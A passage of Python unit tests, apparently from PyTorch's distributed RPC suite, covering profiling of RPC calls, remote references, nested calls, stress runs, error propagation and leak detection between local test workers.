self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
